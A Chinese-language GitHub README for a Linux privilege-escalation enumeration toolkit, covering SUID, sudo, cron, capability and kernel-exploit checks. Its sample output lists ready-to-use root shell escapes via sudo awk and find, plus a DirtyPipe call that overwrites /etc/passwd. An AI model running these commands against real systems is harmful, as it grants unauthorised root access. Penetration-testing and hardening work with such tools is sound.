javokhir-sec/linux-privesc

GitHub: javokhir-sec/linux-privesc

Linux 权限提升工具包,通过自动化枚举与智能匹配帮助安全研究人员快速发现和利用 Linux 系统中的提权向量。

Stars: 1 | Forks: 0

# 🐧 Linux 权限提升工具包

## 💡 什么是 Linux-Privesc? 一个用于查找和利用 Linux 权限提升向量的综合工具包: - 🔍 **自动枚举** — 一条命令执行 200 多项检查 - 🎯 **智能匹配** — 根据 kernel、SUID、capabilities 建议利用方式 - 📚 **动态文档** — 每种技术都有解释和修复方案 - 🛠️ **漏洞编译器** — 自动为您的目标编译 kernel exploit ## 🚀 快速开始 ``` git clone https://github.com/javokhir-sec/linux-privesc.git cd linux-privesc chmod +x privesc.sh # Full enumeration ./privesc.sh full # Quick check(最常见的前 20 个) ./privesc.sh quick # Specific category ./privesc.sh suid ./privesc.sh capabilities ./privesc.sh cron ./privesc.sh sudo ``` ## 📋 涵盖范围 | 类别 | 检查项 | 示例 | |----------|--------|----------| | 🔑 SUID/SGID | 30+ | find, vim, bash, python, pkexec | | ⚡ Sudo | 20+ | LD_PRELOAD, env_keep, NOPASSWD | | 🕐 Cron Jobs | 15+ | 可写脚本, PATH 劫持 | | 🔧 Capabilities | 10+ | cap_sys_ptrace, cap_dac_read_search | | 📂 文件权限 | 25+ | Shadow 可读, SSH 密钥, 配置文件 | | 🐧 Kernel Exploit | 40+ | DirtyCow, DirtyPipe, PwnKit, GameOver(lay) | | 🔗 NFS/共享 | 5+ | no_root_squash, 挂载的共享 | | 🐳 Docker/LXC | 10+ | 特权容器, socket 暴露 | | 📝 可写文件 | 20+ | /etc/passwd, /etc/sudoers, services | | 🔐 凭据搜寻 | 15+ | 历史文件, 配置文件, 日志 | ## ⚡ 输出示例 ``` 🐧 Linux-Privesc v1.0 — Starting enumeration... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ [+] OS: Ubuntu 20.04.6 LTS | Kernel: 5.4.0-150-generic [+] User: www-data (uid=33) 🔑 SUID Binaries: ⚠️ /usr/bin/find — GTFOBins: privesc via -exec ⚠️ /usr/bin/python3.8 — GTFOBins: capability abuse ⚡ Sudo Rights: ⚠️ (ALL) NOPASSWD: /usr/bin/awk — GTFOBins: shell escape 🐧 Kernel Exploits: 💀 CVE-2022-0847 (DirtyPipe) — Kernel 5.4.0 MATCH! 💀 CVE-2021-4034 (PwnKit) — pkexec found! 🎯 Quick Wins (3 found): 1. sudo awk 'BEGIN {system("/bin/sh")}' 2. find . -exec /bin/sh -p \; -quit 3. ./DirtyPipe-exploit /etc/passwd 1 ootz ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ✅ Enumeration complete. 3 quick wins found! ``` ## 📜 许可证 MIT © [Javokhir Tursunboyev](https://github.com/javokhir-sec)
标签:Bash, Python, Web报告查看器, 协议分析, 对称加密, 应用安全, 无后门, 权限提升, 自动化审计, 逆向工具